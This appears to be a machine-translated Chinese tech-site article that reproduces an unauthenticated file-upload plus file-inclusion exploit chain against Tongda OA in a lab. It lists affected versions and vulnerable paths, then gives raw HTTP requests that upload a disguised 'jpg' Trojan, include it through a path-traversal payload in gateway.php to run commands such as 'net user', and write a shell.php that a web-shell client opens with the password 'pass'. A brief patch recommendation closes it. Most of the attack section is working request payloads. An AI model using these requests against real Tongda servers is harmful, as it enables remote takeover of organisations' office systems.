Shulou(Shulou.com)05/31 Report--

Today, I will talk to you about the example analysis of getshell caused by any file upload loophole and file containing loopholes in the foreground of Tongda OA. Many people may not know much about it. In order to make you understand better, the editor has summarized the following contents for you. I hope you can get something according to this article.

I. introduction of loopholes

Tongda OA introduction:

Tongda OA (Office Anywhere Network Intelligent Office system) is a collaborative office automation software independently developed by Beijing Tongda Xinke Technology Co., Ltd. Beijing Tongda Xinke Technology Co., Ltd. is a high-tech team whose main business is collaborative management software R & D and implementation, service and consultation. It is the only central enterprise unit in the domestic collaborative management software industry and the leading enterprise of collaborative management software in China.

OA provides information management capabilities for many users of different sizes in various industries, including process approval, administrative office, daily affairs, data statistical analysis, instant messaging, mobile office, etc., to help users reduce communication and management costs and improve production and decision-making efficiency. The system adopts the leading Bamp S (browser / server) operation mode, so that the network office is not limited by the region. Tongda Office Anywhere uses WEB-based enterprise computing, the main HTTP server uses the world's most advanced Apache server, stable and reliable performance. Data access is centrally controlled to avoid the possibility of data leakage. Provide data backup tools to protect the data security of the system. Multi-level access control, perfect password authentication and login authentication mechanism strengthen the security of the system.

The versions affected by the vulnerability are:

V11, 2017, 2016, 2015, 2013 enhanced, 2013.

Note:

Vulnerabilities can be exploited at the front desk without login.

Version 2013:

File upload vulnerability path: / ispirit/im/upload.php

The file contains the vulnerability path: / ispirit/interface/gateway.php

Version 2017:

File upload vulnerability path: / ispirit/im/upload.php

The file contains the vulnerability path: / mac/gateway.php

Vulnerability environment:

Target machine (Windows server 2008 R2) IP:172.16.0.45

Access to OA:V version 11.3

Second, environmental construction

(1) after downloading OA V11.3, click the application running TDOA11.3 to run the file.

(2) to ensure that port 80 is not occupied, build the application on port 80, and then click next.

(3) configuration completed

(4) View the results of the build.

(5) the account is admin and the password is empty. Log in to the backend system.

III. Loophole recurrence 3.1 arbitrary command execution

(1) loopholes in uploading arbitrary files at the foreground: no need to log in, grab arbitrary data packets, modify packets for replay, and upload Trojan files with the suffix jpg

POST / ispirit/im/upload.php HTTP/1.1Host: 172.16.0.45Cache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypyfBh2YB4pV8McGBAccept: * / * Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,zh-HK;q=0.8,ja;q=0.7,en PHPSESSID=123Connection: closeContent-Length: 660-WebKitFormBoundarypyfBh2YB4pV8McGBContent-Disposition: form-data; name= "UPLOAD_MODE" 2-WebKitFormBoundarypyfBh2YB4pV8McGBContent-Disposition: form-data; name= "P" 123-WebKitFormBoundarypyfBh2YB4pV8McGBContent-Disposition: form-data; name= "DEST_UID" 1-WebKitFormBoundarypyfBh2YB4pV8McGBContent-Disposition: form-data; name= "ATTACHMENT" filename= "jpg" Content-Type: image/jpeg-WebKitFormBoundarypyfBh2YB4pV8McGB--

(2) View the running results

(3) the foreground file contains vulnerabilities: modify the data packet and include the previously uploaded jpg Trojan file to execute arbitrary commands.

Execute the command "net user" here

POST / ispirit/interface/gateway.php HTTP/1.1Host: 172.16.0.45Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh Q=0.9Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 71json = {"url": "/ general/../../attach/im/2012/820434636.jpg"} & cmd=net user

(4) the foreground file contains vulnerabilities: modify the data packet and include the previously uploaded jpg Trojan file to execute arbitrary commands.

Execute the command "ipconfig" here

POST / ispirit/interface/gateway.php HTTP/1.1Host: 172.16.0.45Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh Q=0.9Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 73json = {"url": "/ general/../../attach/im/2012/820434636.jpg"} & cmd=ipconfig

3.2 getshell

(1) vulnerabilities in uploading arbitrary files in the foreground: grab arbitrary data packets, modify packets for replay, and upload Trojan files with the suffix jpg (Trojan files perform write file operations)

POST / ispirit/im/upload.php HTTP/1.1Host: 172.16.0.45Cache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypyfBh2YB4pV8McGBAccept: * / * Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,zh-HK;q=0.8,ja;q=0.7,en PHPSESSID=123Connection: closeContent-Length: 1393-WebKitFormBoundarypyfBh2YB4pV8McGBContent-Disposition: form-data; name= "UPLOAD_MODE" 2-WebKitFormBoundarypyfBh2YB4pV8McGBContent-Disposition: form-data; name= "P" 123-WebKitFormBoundarypyfBh2YB4pV8McGBContent-Disposition: form-data; name= "DEST_UID" 1-WebKitFormBoundarypyfBh2YB4pV8McGBContent-Disposition: form-data; name= "ATTACHMENT" filename= "jpg" Content-Type: image/jpeg-WebKitFormBoundarypyfBh2YB4pV8McGB--

(2) View the running results

(3) View the file information in the / webroot/ispirit/interface/ directory

(4) foreground file contains vulnerabilities: modify the packet to include the previously uploaded jpg Trojan file, which will generate a shell.php file under the root directory contained in the file.

POST / ispirit/interface/gateway.php HTTP/1.1Host: 172.16.0.45Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh Q=0.9Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 73json = {"url": "/ general/../../attach/im/2012/213131861.jpg"} & cmd=ipconfig

(5) View the execution results of files containing vulnerabilities

(6) use ice scorpion to connect: http://172.16.0.45/ispirit/interface/shell.php

Password: pass

PS: ant sword and kitchen knife cannot be connected here.

IV. Suggestions for reinforcement

It is recommended to use the affected version of Tongda OA users to log in to the official website of Tongda OA to get the latest patches. Please select the corresponding program file according to the current OA version and make a backup before running it.

After reading the above, do you have any further understanding of the sample analysis of getshell caused by any file upload vulnerabilities and file containing vulnerabilities in the foreground of Tongda OA? If you want to know more knowledge or related content, please follow the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.